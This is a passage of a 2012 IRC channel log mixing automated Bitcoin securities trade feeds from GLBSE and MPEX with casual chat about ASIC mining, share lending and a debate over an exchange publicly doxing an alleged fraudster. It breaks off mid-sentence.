[F.GIGA.ETF] 2917 @ 0.00028594 = 0.8341 BTC [+] Sep 19 06:07:11 [MPEX] [F.GIGA.ETF] 13600 @ 0.00030483 = 4.1457 BTC [+] Sep 19 06:10:01 [MPEX] [F.GIGA.ETF] 2065 @ 0.00032642 = 0.6741 BTC [+] Sep 19 06:11:20 [GLBSE] [HYDRO.BONDS] 2 @ 1.3735 = 2.747 BTC [+] Sep 19 06:13:44 [GLBSE] [OBSI.HRPT] 2 @ 0.1029 = 0.2058 BTC [+] Sep 19 06:14:37 [GLBSE] [GSDPT] 25 @ 0.0034 = 0.085 BTC [+] Sep 19 06:14:39 [GLBSE] [BITCOINRS] 1 @ 0.05 BTC [+] Sep 19 06:25:44 [GLBSE] [BDK.BND] 1 @ 0.0989 BTC [+] Sep 19 06:26:08 [GLBSE] [ASICMINER] 1 @ 0.1158 BTC [+] Sep 19 06:26:49 [GLBSE] [ASICMINER] 1 @ 0.11597982 BTC [+] Sep 19 06:28:59 [MPEX] [S.MPOE] 26600 @ 0.00041095 = 10.9313 BTC [-] Sep 19 06:29:00 [MPEX] [S.MPOE] 20330 @ 0.00041011 = 8.3375 BTC [-] Sep 19 06:29:02 [MPEX] [S.MPOE] 17462 @ 0.00040989 = 7.1575 BTC [-] Sep 19 06:29:03 [MPEX] [S.MPOE] 22100 @ 0.00040698 = 8.9943 BTC [-] Sep 19 06:29:04 [MPEX] [S.MPOE] 12077 @ 0.00040698 = 4.9151 BTC [-] Sep 19 06:29:05 [MPEX] [S.MPOE] 24900 @ 0.00040698 = 10.1338 BTC [-] Sep 19 06:29:06 [MPEX] [S.MPOE] 28159 @ 0.00040698 = 11.4601 BTC [-] Sep 19 06:29:07 [MPEX] [S.MPOE] 33620 @ 0.00040698 = 13.6827 BTC [-] Sep 19 06:29:08 [MPEX] [S.MPOE] 52497 @ 0.00040698 = 21.3652 BTC [-] Sep 19 06:29:09 [MPEX] [S.MPOE] 43600 @ 0.00040698 = 17.7443 BTC [-] Sep 19 06:29:10 [MPEX] [S.MPOE] 11655 @ 0.00040697 = 4.7432 BTC [-] Sep 19 06:29:34 [GLBSE] [ASICMINER] 5 @ 0.11597982 = 0.5799 BTC [+] Sep 19 06:29:34 [GLBSE] [ASICMINER] 9 @ 0.1159998 = 1.044 BTC [+] Sep 19 06:29:36 [GLBSE] [ASICMINER] 45 @ 0.11599999 = 5.22 BTC [+] Sep 19 06:32:07 [GLBSE] [CPA] 2 @ 0.054 = 0.108 BTC [+] Sep 19 06:36:48 [GLBSE] [GOLD] 100 @ 0.01 = 1 BTC [+] Sep 19 06:37:45 [GLBSE] [GOLD] 100 @ 0.01 = 1 BTC [+] Sep 19 06:39:35 [GLBSE] [GMVT-BOT] 6 @ 0.13 = 0.78 BTC [+] Sep 19 06:39:37 [GLBSE] [GMVT-BOT] 6 @ 0.12011001 = 0.7207 BTC [-] Sep 19 06:39:38 [GLBSE] [GMVT-BOT] 4 @ 0.12010001 = 0.4804 BTC [-] Sep 19 06:39:38 [GLBSE] [GMVT-BOT] 9 @ 0.11 = 0.99 BTC [-] Sep 19 06:40:00 [GLBSE] [JLP-BMD] 45 @ 0.0849 = 3.8205 BTC [-] Sep 19 06:40:02 [GLBSE] [JLP-BMD] 1 @ 0.09485 BTC [+] Sep 19 06:40:24 [GLBSE] [OBSI.HRPT] 28 @ 0.1029 = 2.8812 BTC [+] Sep 19 06:42:41 [GLBSE] [GSDPT] 15 @ 0.0034 = 0.051 BTC [+] Sep 19 06:50:53 [MPEX] [O.BTCUSD.C090T] 590 @ 0.31911147 = 188.2758 BTC [+] Sep 19 07:00:59 [MPEX] [O.BTCUSD.P120T] 10 @ 0.09783157 = 0.9783 BTC [-] Sep 19 07:01:54 [GLBSE] [OBSI.HRPT] 1 @ 0.1029 BTC [+] Sep 19 07:02:20 [GLBSE] [JAH] 2 @ 0.11 = 0.22 BTC [-] Sep 19 07:03:25 https://bitcointalk.org/index.php?topic=110090.msg1197494#msg1197494 Sep 19 07:03:27 lol srsly? Sep 19 07:11:12 Yes yes yes yes, chinese co Sep 19 07:12:06 Roll the wheel, see if it lands on the "Real co with poor english" Sep 19 07:12:26 Or one of the many "better luck next time" ones Sep 19 07:13:20 How did his FPGA end up by the way? Sep 19 07:16:31 [GLBSE] [ASICMINER] 10 @ 0.117 = 1.17 BTC [+] Sep 19 07:16:32 [GLBSE] [ASICMINER] 11 @ 0.11878988 = 1.3067 BTC [+] Sep 19 07:16:33 [GLBSE] [ASICMINER] 1 @ 0.11878989 BTC [+] Sep 19 07:17:13 [GLBSE] [ASICMINER] 1 @ 0.11878989 BTC [+] Sep 19 07:17:23 was quite popular Sep 19 07:20:54 is he selling stock on glbse? Sep 19 07:22:18 [GLBSE] [OBSI.HRPT] 36 @ 0.1029 = 3.7044 BTC [+] Sep 19 07:22:49 damn Sep 19 07:24:27 I just don't know if prices will drop like a rock for ASICs, or stay steady... we need to incite some price wars Sep 19 07:25:35 Diablo-D3: learn to ASIC and lets make our own run of chips Sep 19 07:25:47 nope Sep 19 07:25:52 it isnt the design thing thats the issue Sep 19 07:26:03 I can pirate the relevant software if I gave a fuck Sep 19 07:26:10 its dealing with the chinese to fab it Sep 19 07:26:11 nothx Sep 19 07:26:17 Ill gladly pay someone else to do it Sep 19 07:27:18 sooo, anyone wants to lend me asicminer shares for 3 months ? Sep 19 07:27:30 For which purpose? Sep 19 07:27:40 what difference does it make ? Sep 19 07:27:49 I'm curious Sep 19 07:27:58 [MPEX] [S.MPOE] 14045 @ 0.00040697 = 5.7159 BTC [-] Sep 19 07:27:59 [MPEX] [S.MPOE] 31916 @ 0.00040696 = 12.9885 BTC [-] Sep 19 07:28:01 [MPEX] [S.MPOE] 15251 @ 0.00040693 = 6.2061 BTC [-] Sep 19 07:28:04 mircea_popescu: no. Sep 19 07:28:11 Also, how many and for what kind of fee? Sep 19 07:28:19 well how many you got ? Sep 19 07:28:39 eh, not much, only 1247 Sep 19 07:28:56 [GLBSE] [ASICMINER] 1 @ 0.116 BTC [-] Sep 19 07:28:57 [GLBSE] [ASICMINER] 5 @ 0.1121 = 0.5605 BTC [-] Sep 19 07:28:59 [GLBSE] [ASICMINER] 22 @ 0.11200101 = 2.464 BTC [-] Sep 19 07:29:00 [GLBSE] [ASICMINER] 42 @ 0.11200002 = 4.704 BTC [-] Sep 19 07:29:02 sounds perfect. i'll take the lot, you can have dividends +1% a month Sep 19 07:29:03 https://bitcointalk.org/index.php?topic=109349.msg1202784#msg1202784 Sep 19 07:29:12 you can only have them back on 19th of dec. Sep 19 07:29:15 heh Sep 19 07:29:54 Would be good with me. Sep 19 07:30:10 aite, pm me your email i'll send you a gpg contract. Sep 19 07:30:35 Right away. wait Sep 19 07:31:00 you know what we should do Sep 19 07:31:09 we should vote to have nefario removed from GLBSE Sep 19 07:31:12 wouldnt that be funny Sep 19 07:31:18 im for it Sep 19 07:31:21 i mean, i dont want him really removed Sep 19 07:31:23 but it would be funny Sep 19 07:31:35 get mircea_popescu to take over Sep 19 07:31:40 no Sep 19 07:31:42 i do not agree with that Sep 19 07:31:43 i don't think the owners would find a cheaper fool. Sep 19 07:32:02 glbse needs moar pr0n tbh Sep 19 07:33:09 ;;ident BTC-Mining Sep 19 07:33:10 Nick 'BTC-Mining', with hostmask 'BTC-Mining!~BTC-Minin@modemcable037.34-22-96.mc.videotron.ca', is identified as user Namjies, with GPG key id F2758D83EEEDE453, key fingerprint F12DE6B4E1EF26F5768BE918F2758D83EEEDE453, and bitcoin address None Sep 19 07:42:09 hehe Sep 19 07:42:12 someone singed up to bitvps yesterday Sep 19 07:42:17 with the company name 'bitporn.com' Sep 19 07:42:20 so your wish might come trrue Sep 19 07:43:09 I just don't want nefario out. It's a good platform, albeit slow. Sep 19 07:43:39 rg: mirror content plox Sep 19 07:43:48 it will be our secret Sep 19 07:44:12 I think he should keep developing Sep 19 07:50:06 i was jk Sep 19 07:50:10 anything to hassle anyone Sep 19 07:50:30 someone paid for bitvps with a stolen paypal Sep 19 07:50:42 and when they filled in the 'where ddi you hear about us' Sep 19 07:50:45 they listed eligius / luke-jr Sep 19 07:50:48 lol Sep 19 07:50:58 are you going to publicly shame them Sep 19 07:51:01 fail Sep 19 07:51:22 it's true, Luke-Jr is known for his stolen paypals Sep 19 07:51:29 it was probably someone trying to improve eligius' credibility Sep 19 07:51:31 Azelphur: troll Sep 19 07:51:43 Luke-Jr: hi captain obvious Sep 19 07:51:52 [GLBSE] [OBSI.HRPT] 1 @ 0.10285 BTC [-] Sep 19 07:51:54 [GLBSE] [OBSI.HRPT] 1 @ 0.1019 BTC [-] Sep 19 07:51:54 [GLBSE] [OBSI.HRPT] 18 @ 0.10120001 = 1.8216 BTC [-] Sep 19 07:51:56 [GLBSE] [OBSI.HRPT] 4 @ 0.1012 = 0.4048 BTC [-] Sep 19 07:51:57 [GLBSE] [OBSI.HRPT] 6 @ 0.1011 = 0.6066 BTC [-] Sep 19 07:51:58 Luke-Jr: did you see the news about the jesus wife thing? Sep 19 07:52:25 dub: fiction isn't news. Sep 19 07:52:31 neither is trolling Sep 19 07:52:53 if your question is really "is jzknight still in #eligius", then the answer is yes Sep 19 07:53:22 typical head in sand response Sep 19 07:53:45 http://bloggingblue.com/wp-content/uploads/2012/01/Ostrich-man-head-in-sand.gif Sep 19 07:53:57 [MPEX] [S.MPOE] 16317 @ 0.00040693 = 6.6399 BTC [-] Sep 19 07:53:59 [MPEX] [S.MPOE] 37916 @ 0.00040691 = 15.4284 BTC [-] Sep 19 07:54:00 [MPEX] [S.MPOE] 6567 @ 0.00040668 = 2.6707 BTC [-] Sep 19 07:54:02 but now now, lets not pick on people for their religion :p Sep 19 07:54:29 its not fiction Sep 19 07:54:32 im serious Sep 19 07:54:51 they signed up a s Sep 19 07:54:54 'Ann marie Vaugh' Sep 19 07:54:54 im not picking, theres credible evidense that there exists a document from 400ad discussing jesus being married Sep 19 07:55:03 rg: lol Sep 19 07:55:10 dub ya i just saw that. Sep 19 07:55:21 which throws a big old spanner into Luke-Jr's fairy tale reality Sep 19 07:55:52 dub: yes, we all know that religious people are illogical and refuse to see fact, but picking on them only makes them mad :p Sep 19 07:56:08 and doesn't really serve to change anything Sep 19 07:56:45 dub: yeah… head in sand who? Sep 19 07:57:11 lol Sep 19 07:57:19 "oh, 2 of 3 reviews thought it was bogus, but we didn't tell them it was showed to some friends, so ignore that! besides, we're not trying to pull anything here - trust us, ok?" Sep 19 07:57:34 soooooo convincing Sep 19 07:57:35 the old 'NO U' defense Sep 19 07:57:52 yes, 'NO U' is the correct and only response to ad hominem Sep 19 08:11:58 [GLBSE] [OBSI.HRPT] 1 @ 0.1011 BTC [-] Sep 19 08:11:59 [GLBSE] [OBSI.HRPT] 17 @ 0.10101001 = 1.7172 BTC [-] Sep 19 08:12:01 [GLBSE] [OBSI.HRPT] 4 @ 0.10101 = 0.404 BTC [-] Sep 19 08:12:02 [GLBSE] [OBSI.HRPT] 1 @ 0.1005 BTC [-] Sep 19 08:12:03 [GLBSE] [OBSI.HRPT] 3 @ 0.10005 = 0.3002 BTC [-] Sep 19 08:12:04 [GLBSE] [OBSI.HRPT] 10 @ 0.10005 = 1.0005 BTC [-] Sep 19 08:12:06 [GLBSE] [OBSI.HRPT] 14 @ 0.10005 = 1.4007 BTC [-] Sep 19 08:19:59 [MPEX] [S.MPOE] 3700 @ 0.00041048 = 1.5188 BTC [+] Sep 19 08:25:15 [GLBSE] [OBSI.HRPT] 2 @ 0.10005 = 0.2001 BTC [-] Sep 19 08:29:18 [GLBSE] [YABMC] 1 @ 0.0949 BTC [+] Sep 19 08:34:54 [GLBSE] [OBSI.HRPT] 2 @ 0.10005 = 0.2001 BTC [-] Sep 19 08:49:07 [MPEX] [S.MPOE] 20140 @ 0.00041048 = 8.2671 BTC [+] Sep 19 08:49:08 [MPEX] [S.MPOE] 12545 @ 0.00041512 = 5.2077 BTC [+] Sep 19 08:49:09 [MPEX] [S.MPOE] 8815 @ 0.00041577 = 3.665 BTC [+] Sep 19 08:51:49 [GLBSE] [BLUECHIP] 48 @ 0.1 = 4.8 BTC [+] Sep 19 08:53:36 [GLBSE] [GSDPT] 7 @ 0.00339 = 0.0237 BTC [-] Sep 19 09:00:58 [MPEX] [O.BTCUSD.P160T] 1 @ 0.41015767 BTC [-] Sep 19 09:05:06 [GLBSE] [GIGAMINING] 3 @ 0.61010001 = 1.8303 BTC [-] Sep 19 09:05:19 [GLBSE] [GOLD] 5 @ 0.01 = 0.05 BTC [+] Sep 19 09:06:39 [GLBSE] [GIGAMINING] 4 @ 0.61 = 2.44 BTC [-] Sep 19 09:08:53 [GLBSE] [GIGAMINING] 2 @ 0.61000001 = 1.22 BTC [+] Sep 19 09:10:53 [GLBSE] [GIGAMINING] 3 @ 0.58010001 = 1.7403 BTC [-] Sep 19 09:11:13 [GLBSE] [RSM] 1 @ 0.27 BTC [-] Sep 19 09:11:15 [GLBSE] [RSM] 10 @ 0.26 = 2.6 BTC [-] Sep 19 09:15:33 [GLBSE] [FPGAMINING] 1 @ 0.6779 BTC [-] Sep 19 09:16:06 [GLBSE] [BITBOND] 7 @ 0.3699 = 2.5893 BTC [+] Sep 19 09:23:44 [GLBSE] [ASICMINER] 19 @ 0.118749 = 2.2562 BTC [+] Sep 19 09:23:45 [GLBSE] [ASICMINER] 15 @ 0.11875 = 1.7813 BTC [+] Sep 19 09:23:47 [GLBSE] [ASICMINER] 19 @ 0.11878989 = 2.257 BTC [+] Sep 19 09:23:47 [GLBSE] [ASICMINER] 100 @ 0.118889 = 11.8889 BTC [+] Sep 19 09:23:48 [GLBSE] [ASICMINER] 1 @ 0.11895 BTC [+] Sep 19 09:23:49 [GLBSE] [ASICMINER] 50 @ 0.11899 = 5.9495 BTC [+] Sep 19 09:23:51 [GLBSE] [ASICMINER] 46 @ 0.119 = 5.474 BTC [+] Sep 19 09:24:20 [GLBSE] [ASICMINER] 4 @ 0.119 = 0.476 BTC [+] Sep 19 09:28:44 [MPEX] [F.GIGA.ETF] 3300 @ 0.00030772 = 1.0155 BTC [-] Sep 19 09:28:45 [MPEX] [F.GIGA.ETF] 3353 @ 0.00029932 = 1.0036 BTC [-] Sep 19 09:30:41 [GLBSE] [TYGRR.BOND-P] 64 @ 0.0500005 = 3.2 BTC [-] Sep 19 09:30:41 [GLBSE] [TYGRR.BOND-P] 100 @ 0.05 = 5 BTC [-] Sep 19 09:31:05 [GLBSE] [FOO.PPPPT] 46 @ 0.05 = 2.3 BTC [-] Sep 19 09:33:48 [GLBSE] [RAREEARTH] 30 @ 0.01 = 0.3 BTC [+] Sep 19 09:35:28 [GLBSE] [OBSI.HRPT] 8 @ 0.10005001 = 0.8004 BTC [+] Sep 19 09:35:30 [GLBSE] [OBSI.HRPT] 12 @ 0.10005 = 1.2006 BTC [-] Sep 19 09:35:31 [GLBSE] [OBSI.HRPT] 99 @ 0.10003 = 9.903 BTC [-] Sep 19 09:35:31 [GLBSE] [OBSI.HRPT] 100 @ 0.10000001 = 10 BTC [-] Sep 19 09:35:33 [GLBSE] [OBSI.HRPT] 4 @ 0.10000001 = 0.4 BTC [-] Sep 19 09:35:34 [GLBSE] [OBSI.HRPT] 200 @ 0.1 = 20 BTC [-] Sep 19 09:35:35 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [-] Sep 19 09:35:36 [GLBSE] [OBSI.HRPT] 3000 @ 0.1 = 300 BTC [-] Sep 19 09:35:52 [GLBSE] [GIGAMINING] 4 @ 0.62999996 = 2.52 BTC [+] Sep 19 09:36:17 [GLBSE] [OBSI.HRPT] 11 @ 0.1 = 1.1 BTC [-] Sep 19 09:40:26 [GLBSE] [FDBF] 3 @ 0.14500001 = 0.435 BTC [-] Sep 19 09:41:12 [GLBSE] [OBSI.HRPT] 5 @ 0.10279999 = 0.514 BTC [+] Sep 19 09:45:51 [GLBSE] [MMM] 2 @ 0.79 = 1.58 BTC [+] Sep 19 09:48:39 [GLBSE] [BITNODES] 1 @ 0.24298 BTC [-] Sep 19 09:48:41 [GLBSE] [BITNODES] 1 @ 0.2499 BTC [+] Sep 19 09:55:57 [MPEX] [F.GIGA.ETF] 8364 @ 0.0002737 = 2.2892 BTC [-] Sep 19 09:55:58 [MPEX] [F.GIGA.ETF] 1436 @ 0.00027278 = 0.3917 BTC [-] Sep 19 09:57:51 is something wrong with MPEX Sep 19 09:57:53 i cant seem to reach it Sep 19 09:58:41 pings fine Sep 19 09:58:50 urllib2.URLError: Sep 19 09:59:01 would think that's a DNS problem Sep 19 09:59:03 not a box problem Sep 19 09:59:47 i can look it up just fine Sep 19 09:59:47 wtf Sep 19 09:59:58 It's just you. http://mpex.us is up. Sep 19 10:00:15 [james@elephant ~]$ telnet polimedia.us 80 Sep 19 10:00:15 Trying 63.247.64.92... Sep 19 10:00:40 telnet ? Sep 19 10:00:41 lol. Sep 19 10:00:50 what's wrong with telnet? Sep 19 10:01:03 i don't run telnet. Sep 19 10:01:09 well that's great Sep 19 10:01:12 but im not connecting to telnet Sep 19 10:01:14 telnet is port 23 Sep 19 10:01:18 im clearly trying to cnnect to port 80 Sep 19 10:01:20 which is http Sep 19 10:01:25 o i c. Sep 19 10:01:34 [GLBSE] [GIGAMINING] 4 @ 0.62999996 = 2.52 BTC [+] Sep 19 10:01:35 [GLBSE] [GIGAMINING] 4 @ 0.62999997 = 2.52 BTC [+] Sep 19 10:01:37 [GLBSE] [GIGAMINING] 2 @ 0.62999998 = 1.26 BTC [+] Sep 19 10:01:38 hey, i skim. Sep 19 10:01:43 haha me too Sep 19 10:01:49 im notorious for skimming Sep 19 10:03:05 [GLBSE] [HYDRO.BONDS] 1 @ 1.3739 BTC [+] Sep 19 10:07:15 wtf why wont this work Sep 19 10:07:34 GNAX figured out it was me Sep 19 10:07:37 and they firewalled me out Sep 19 10:08:09 what wont work? Sep 19 10:08:45 MPEX is being a dick to me Sep 19 10:11:10 rg lol you got banned boi Sep 19 10:11:28 i'm not surprised if you're doing weirdo telnet into 80 that you'd get on the list. Sep 19 10:13:58 [GLBSE] [HYDRO.BONDS] 1 @ 1.3737 BTC [-] Sep 19 10:18:31 pff Sep 19 10:18:37 telneting to port 80 is the same as connecting with a browser Sep 19 10:19:16 X-UA-Im-so-fresh: you can suck my nuts Sep 19 10:19:46 lol Sep 19 10:20:56 [GLBSE] [PUREMINING] 3 @ 0.095995 = 0.288 BTC [-] Sep 19 10:24:56 [MPEX] [S.MPOE] 31293 @ 0.00041258 = 12.9109 BTC [-] Sep 19 10:42:01 [GLBSE] [YABMC] 2 @ 0.094 = 0.188 BTC [-] Sep 19 10:52:56 [MPEX] [S.MPOE] 14800 @ 0.00040999 = 6.0679 BTC [-] Sep 19 11:09:35 [GLBSE] [ZETA-MINING] 2 @ 0.1624 = 0.3248 BTC [+] Sep 19 11:10:17 [GLBSE] [ZETA-MINING] 15 @ 0.17 = 2.55 BTC [+] Sep 19 11:10:41 [GLBSE] [ZETA-MINING] 1 @ 0.18894 BTC [+] Sep 19 11:18:57 [MPEX] [S.MPOE] 40831 @ 0.00040668 = 16.6052 BTC [-] Sep 19 11:18:58 [MPEX] [S.MPOE] 10269 @ 0.00040609 = 4.1701 BTC [-] Sep 19 11:44:56 [MPEX] [S.MPOE] 29331 @ 0.00040609 = 11.911 BTC [-] Sep 19 11:44:58 [MPEX] [S.MPOE] 4400 @ 0.00040527 = 1.7832 BTC [-] Sep 19 11:44:59 [MPEX] [S.MPOE] 24869 @ 0.00040444 = 10.058 BTC [-] Sep 19 11:55:08 [GLBSE] [YABMC] 99 @ 0.0726 = 7.1874 BTC [-] Sep 19 11:55:09 [GLBSE] [YABMC] 131 @ 0.0725 = 9.4975 BTC [-] Sep 19 12:13:48 [GLBSE] [JTME] 4 @ 0.7 = 2.8 BTC [-] Sep 19 12:15:52 [MPEX] [F.GIGA.ETF] 2200 @ 0.00027565 = 0.6064 BTC [+] Sep 19 12:19:36 [GLBSE] [YABMC] 69 @ 0.0725 = 5.0025 BTC [-] Sep 19 12:19:37 [GLBSE] [YABMC] 10 @ 0.0705 = 0.705 BTC [-] Sep 19 12:19:38 [GLBSE] [YABMC] 2 @ 0.0702 = 0.1404 BTC [-] Sep 19 12:19:39 [GLBSE] [YABMC] 38 @ 0.0701 = 2.6638 BTC [-] Sep 19 12:20:28 [GLBSE] [MU] 4 @ 0.1824 = 0.7296 BTC [-] Sep 19 12:20:29 [GLBSE] [MU] 3 @ 0.1823 = 0.5469 BTC [-] Sep 19 12:21:08 [GLBSE] [OBSI.HRPT] 10 @ 0.10249499 = 1.0249 BTC [-] Sep 19 12:30:21 [GLBSE] [YARR] 2 @ 1 = 2 BTC [-] Sep 19 12:30:31 [GLBSE] [FPGAMINING] 4 @ 0.46710001 = 1.8684 BTC [-] Sep 19 12:30:32 [GLBSE] [FPGAMINING] 8 @ 0.4671 = 3.7368 BTC [-] Sep 19 12:30:34 [GLBSE] [FPGAMINING] 10 @ 0.467 = 4.67 BTC [-] Sep 19 12:30:35 [GLBSE] [FPGAMINING] 4 @ 0.461 = 1.844 BTC [-] Sep 19 12:30:36 [GLBSE] [FPGAMINING] 1 @ 0.46 BTC [-] Sep 19 12:30:36 [GLBSE] [FPGAMINING] 1 @ 0.455 BTC [-] Sep 19 12:30:38 [GLBSE] [FPGAMINING] 4 @ 0.422 = 1.688 BTC [-] Sep 19 12:33:57 [MPEX] [S.DICE] 112000 @ 0.00335 = 375.2 BTC [-] Sep 19 12:50:09 [GLBSE] [OBSI.HRPT] 1 @ 0.10249499 BTC [-] Sep 19 12:53:03 [GLBSE] [OBSI.HRPT] 4 @ 0.10249499 = 0.41 BTC [-] Sep 19 12:54:09 [GLBSE] [FPGA.CONTRACT] 1 @ 0.0619 BTC [-] Sep 19 12:54:42 [GLBSE] [CPA] 1 @ 0.049 BTC [-] Sep 19 12:56:42 [GLBSE] [BMF] 3 @ 0.74 = 2.22 BTC [+] Sep 19 12:59:58 [MPEX] [F.GIGA.ETF] 7745 @ 0.00027565 = 2.1349 BTC [+] Sep 19 13:04:36 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 19 13:04:39 GIGAMINING [1@1BTC] paid: 0.45625096 BTC. Last price: 0.62999998 BTC. Capital gain: -0.37000002 BTC. Total: 0.08625094 BTC. (8.6%) Sep 19 13:06:28 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 19 13:06:31 GIGAMINING [1@0.9BTC] paid: 0.45625096 BTC. Last price: 0.62999998 BTC. Capital gain: -0.27000002 BTC. Total: 0.18625094 BTC. (20.7%) Sep 19 13:12:44 [GLBSE] [SS] 1 @ 0.02 BTC [-] Sep 19 13:13:23 [GLBSE] [SS] 50 @ 0.0192 = 0.96 BTC [-] Sep 19 13:13:53 [GLBSE] [SS] 75 @ 0.019 = 1.425 BTC [-] Sep 19 13:22:29 [GLBSE] [GIGAMINING] 4 @ 0.66499 = 2.66 BTC [+] Sep 19 13:24:07 [GLBSE] [ASICMINER] 1 @ 0.116 BTC [-] Sep 19 13:25:57 [MPEX] [F.GIGA.ETF] 4955 @ 0.00027565 = 1.3658 BTC [+] Sep 19 13:25:58 [MPEX] [F.GIGA.ETF] 13745 @ 0.00027486 = 3.778 BTC [-] Sep 19 13:27:24 [GLBSE] [BMF] 12 @ 0.74 = 8.88 BTC [+] Sep 19 13:28:16 [GLBSE] [KRAKEN] 35 @ 0.00999996 = 0.35 BTC [+] Sep 19 13:31:21 ;;bc,stats Sep 19 13:31:23 Current Blocks: 199530 | Current Difficulty: 2694047.952955 | Next Difficulty At Block: 199583 | Next Difficulty In: 53 blocks | Next Difficulty In About: 8 hours, 4 minutes, and 57 seconds | Next Difficulty Estimate: 2896700.59267377 | Estimated Percent Change: 7.52223580492 Sep 19 13:32:14 [GLBSE] [BIF.5-10.MININGBOND] 1 @ 0.745 BTC [-] Sep 19 13:43:32 !ticker asicminer Sep 19 13:43:37 [GLBSE:ASICMINER] [Bid: 0.1151] [Ask: 0.11906499] [Spread: 0.00396499] [Last: 0.116] [24hVol: 78.67128296] [7dAvg: 0.11107235] **** BEGIN LOGGING AT Thu Sep 20 00:16:20 2012 Sep 20 00:17:00 [GLBSE] [NASTY] 2 @ 0.51 = 1.02 BTC [-] Sep 20 00:18:43 [GLBSE] [GIGAMINING] 2 @ 0.67010001 = 1.3402 BTC [-] Sep 20 00:18:44 [GLBSE] [GIGAMINING] 7 @ 0.6701 = 4.6907 BTC [-] Sep 20 00:18:45 [GLBSE] [GIGAMINING] 10 @ 0.67 = 6.7 BTC [-] Sep 20 00:20:10 [GLBSE] [BLUECHIP] 50 @ 0.1 = 5 BTC [+] Sep 20 00:23:15 [GLBSE] [PIMP] 5 @ 0.10002 = 0.5001 BTC [-] Sep 20 00:23:17 [GLBSE] [PIMP] 100 @ 0.10001 = 10.001 BTC [-] Sep 20 00:39:26 [GLBSE] [PUREMINING] 5 @ 0.0955 = 0.4775 BTC [-] Sep 20 00:40:36 [GLBSE] [FPGAMINING] 1 @ 0.65899999 BTC [+] Sep 20 00:42:00 [MPEX] [F.GIGA.ETF] 2580 @ 0.00026415 = 0.6815 BTC [-] Sep 20 00:42:01 [MPEX] [F.GIGA.ETF] 2720 @ 0.000264 = 0.7181 BTC [-] Sep 20 00:44:29 [GLBSE] [GMVT-BOT] 50 @ 0.13999 = 6.9995 BTC [+] Sep 20 00:45:57 [GLBSE] [CIUCIU.BOND] 65 @ 0.10989 = 7.1429 BTC [+] Sep 20 00:45:58 [GLBSE] [CIUCIU.BOND] 125 @ 0.1099 = 13.7375 BTC [+] Sep 20 00:46:44 [GLBSE] [CIUCIU.BOND] 300 @ 0.11079 = 33.237 BTC [+] Sep 20 00:47:00 https://bitcointalk.org/index.php?topic=93445.msg1205151#msg1205151 Sep 20 00:48:13 [GLBSE] [GMVT-BOT] 58 @ 0.13999 = 8.1194 BTC [+] Sep 20 00:50:42 [GLBSE] [GIGAMINING] 7 @ 0.64989999 = 4.5493 BTC [-] Sep 20 00:50:44 [GLBSE] [GIGAMINING] 9 @ 0.64999999 = 5.85 BTC [+] Sep 20 00:50:45 [GLBSE] [GIGAMINING] 5 @ 0.65 = 3.25 BTC [+] Sep 20 00:54:40 lol inaba is a retard Sep 20 00:57:02 kakobrekla: why? Sep 20 00:58:24 nefario, walks like a tard, talks like a tard.... Sep 20 00:58:36 have you met him? Sep 20 00:58:44 heh Sep 20 00:59:01 I have Sep 20 00:59:04 i can see the idioticity through his forum posts Sep 20 00:59:05 cool guy Sep 20 00:59:15 total whacko. Sep 20 00:59:16 really Sep 20 00:59:16 howso Sep 20 00:59:25 prolly jerks off while he writes forums posts Sep 20 00:59:29 thats why he is normal in person Sep 20 00:59:36 lol Sep 20 00:59:44 he's actually a really cool guy Sep 20 00:59:58 all the people I had a chance to talk to at the conference were Sep 20 01:00:10 ah Sep 20 01:00:16 you didnt let the uncool people speak Sep 20 01:00:43 anyway what nefario thinks of him doesnt change a thing Sep 20 01:00:59 lol Sep 20 01:02:29 heh don't know yet Sep 20 01:02:33 no ones done it Sep 20 01:03:42 BDT/ bitscalper has been doxed Sep 20 01:03:58 I've been doxed too! Sep 20 01:04:06 https://bitcointalk.org/index.php?topic=93445.msg1205151#msg1205151 Sep 20 01:04:27 usagi: White/Blue will have high requirements Sep 20 01:04:33 usagi: why? Sep 20 01:04:43 doxing is never okay Sep 20 01:04:56 well, depending on how it's done :) Sep 20 01:05:01 yes, that doesn't mean you publish it publicly Sep 20 01:05:25 doxing typically has implications of posting all sorts of personal information in public places Sep 20 01:05:37 some asshole last year enjoyed doing it to ops in #bitcoin-otc who banned him Sep 20 01:06:11 copumpkin: he agreed to it when he got verified on GLBSE Sep 20 01:06:33 nefario: to the public? or to shareholders who request it? Sep 20 01:06:38 if it's to the public, it's fucked Sep 20 01:06:41 public Sep 20 01:06:46 yeah, then that's fucked Sep 20 01:07:05 [MPEX] [S.MPOE] 8800 @ 0.00040909 = 3.6 BTC [-] Sep 20 01:07:06 [MPEX] [S.MPOE] 2000 @ 0.00040867 = 0.8173 BTC [-] Sep 20 01:07:07 [MPEX] [S.MPOE] 3500 @ 0.00040681 = 1.4238 BTC [-] Sep 20 01:07:10 what are credit rating agencies copumpkin Sep 20 01:07:10 you can write a EULA that says "you sign away your firstborn" but that doesn't make it legit Sep 20 01:07:34 you pay them to rate you Sep 20 01:07:42 and you voluntarily provide information Sep 20 01:07:52 they will summarize it and give you a rating Sep 20 01:07:53 you think it's ok he's stolen 100K USD worth of bitcoin or more? Sep 20 01:08:00 I never said that Sep 20 01:08:30 after we catch him I think the instances of fraud on GLBSE will drop Sep 20 01:08:34 but publishing someone's personal information publicly is never okay Sep 20 01:08:37 "catch" hash king? Sep 20 01:08:39 we're going the whole hog with this Sep 20 01:08:40 wtf Sep 20 01:08:45 talk about a witch hunt Sep 20 01:08:48 bit day trade Sep 20 01:08:52 oh okay Sep 20 01:08:57 I don't care about HK Sep 20 01:09:00 not my problem Sep 20 01:09:14 lol Sep 20 01:09:15 can't believe he's only 15 Sep 20 01:09:22 even then, I don't support publishing personal information except to law enforcement or people to serve him with papers Sep 20 01:09:23 he's not 15. Sep 20 01:09:29 jesus fucking christ what's this stupidity. Sep 20 01:09:39 usagi: lol wtf Sep 20 01:09:40 he's not 15 Sep 20 01:10:00 because I've interacted with him extensively, and he owes me thousands of bitcoins? Sep 20 01:10:11 everyone thinks he has a valid opinion now on the basis of having read three posts on an otaku forum somewhere Sep 20 01:10:13 it's sickening. Sep 20 01:10:29 copumpkin, the premise of giving your info to GLBSE to be verified is to agree to disclose them if something happens to you or your issue. Sep 20 01:10:59 BTC-Mining the problem there is that the first time he does that to someone in the eu who's pissy enough and complains to the auithorities Sep 20 